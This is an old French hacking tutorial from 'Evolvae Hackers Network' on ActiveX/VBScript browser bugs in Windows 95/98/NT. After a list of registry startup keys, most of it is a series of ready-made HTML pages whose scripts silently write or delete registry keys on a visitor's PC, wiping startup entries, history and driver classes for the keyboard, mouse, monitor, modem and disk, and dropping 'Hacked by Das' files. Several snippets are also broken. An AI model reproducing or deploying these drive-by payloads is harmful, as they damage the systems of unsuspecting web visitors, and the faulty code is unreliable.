LES TUTORIAUX - les bugs Active X

####################################

[ Les bugs Active X ] by dAs ( dAs@root.ms )

####################################

Avant de pouvoir comprendre ces bugs, je vous conseille de lire ces quelques lignes vous donnant les clés s'executant au démarrage de Windows.
Ces informations sont communes à Windows 95 et 98 (ainsi qu'à Windows NT).
Cliquez sur démarrer, executer et regedit. Voila vous êtes dans la base de registre. Ne modifiez surtout rien : celle ci est indispensable au bon fonctionnement de windows.
Voilà la clé des programmes qui s'execute au démarrage de Windows, c'est souvent dans une de ses clés que se cache un executable plus ou moins indésirable lancé systématiquement au démarrage de Windows :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnce
xxxxxx étant le nom d'un utilisateur (chiffré)
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
Vous y comprenez rien? Arf, c'est pourtant simple =)
Alors nous allons prendre un exemple :
Vous voulez changer le nom que vous aviez rentré au démarrage de Windows, allez dans HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version et modifiez RegisteredOwner et RegisteredOrganization.

BUG activeX
Vous pensiez être en sécurité en surfant sur Internet? Il n'en est rien. Quelqu'un peut utiliser ces bugs pour modifier le coeur de votre PC (si il tourne sousWindows) : la base de registre. Ce qui est écrit en bleu est le code html et ce qui est en rouge sont les régions modifiables =)

ECRIRE DANS LA BASE DE REGISTRE.
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\das\With\Name", "Hacked by Das"
</script>
</body>
</html>

SUPPRIMER UNE CLE DANS LA BASE DE REGISTRE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\hello\"
</script>
</body>
</html>

CREER UN RACCOURCI SUR LE BUREAU
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\evolvae")
RealLink.TargetPath = "http://www.evolvae.cjb.net"
RealLink.Save
end if
</script>
</body>
</html>

CREER UN FICHIER BAT
<html>
<body>
<script Language="VBScript">
Set BatFile = FSO.CreateTextFile("c:\Windows\das.bat", 2, False)
BatFile.WriteLine ""
BatFile.WriteLine "Hacked by Das"
BatFile.Close
</script>
</body>
</html>

SUPPRIMER LES PROGRAMMES SE LANCANT AU DEMARRAGE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run"
</script>
</body>
</html>

MODIFIER LE NOM DE L'ORDINATEUR
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ ComputerName\ComputerName","Hacked by Das"
</script>
</body>
</html>

SUPPRIMER LA FLECHE DES RACCOURCIS
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\IsShortcut"
</script>
</body>
</html>

SUPPRIMER LES PROGRAMMES SE LANCANT AU DEMARRAGE DE MS DOS
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\ WinOldApp\Disabled",1,"REG_DWORD"
</script>
</body>
</html>

SUPPRIMER L'HISTORIQUE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ RecentDocs\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ RunMru\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ Doc Find Spec MRU\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\ FindComputerMRU\"
</script>
</body>
</html>

DESINSTALLER L'IMPRIMANTE
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\"
</script>
</body>
</html>

DESINSTALLER LE CLAVIER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Keyboard\"
</script>
</body>
</html>

DESINSTALLER LE MODEM
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\"
</script>
</body>
</html>

DESINSTALLER L'ECRAN
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Monitor\"
</script>
</body>
</html>

DESINSTALLER LE DISQUE DUR
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\"
</script>
</body>
</html>

SUPPRIMER NUKE NABBER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Sofware\NukeNabber 7.0"
</script>
</body>
</html>

CREER UN FICHIER BATH
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
Set FSO =CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set BatFile = FSO.CreateTextFile("c:\Windows\das.bat", 2, False)
BatFile.WriteLine ""
BatFile.WriteLine "Hacked by Das"
BatFile.Close
end if </script>
</body>
</html>

DETRUIRE LES PILOTES DE LA SOURIS
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\"
</script>
</body>
</html>

ENLEVER LE MENU DEMARRER-->RECHERCHER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoFind", 0 ,"REG_DWORD"
</script>
</body>
</html>

ENLEVER LE MENU DEMARRER-->DOCUMENT
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoRecentDocsMenu", 0 ,"REG_DWORD"
</script>
</body>
</html>

ENLEVER LE MENU DEMARRER-->EXECUTER
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoRun", 0 ,"REG_DWORD"
</script>
</body>
</html>

Texte tiré du site Evolvae Hackers Network

( Vous pouvez recopier ce texte ou le mettre

sur votre site du moment que vous mettez

un lien vers EH Network )

[ http://www.evolvae.cjb.net ]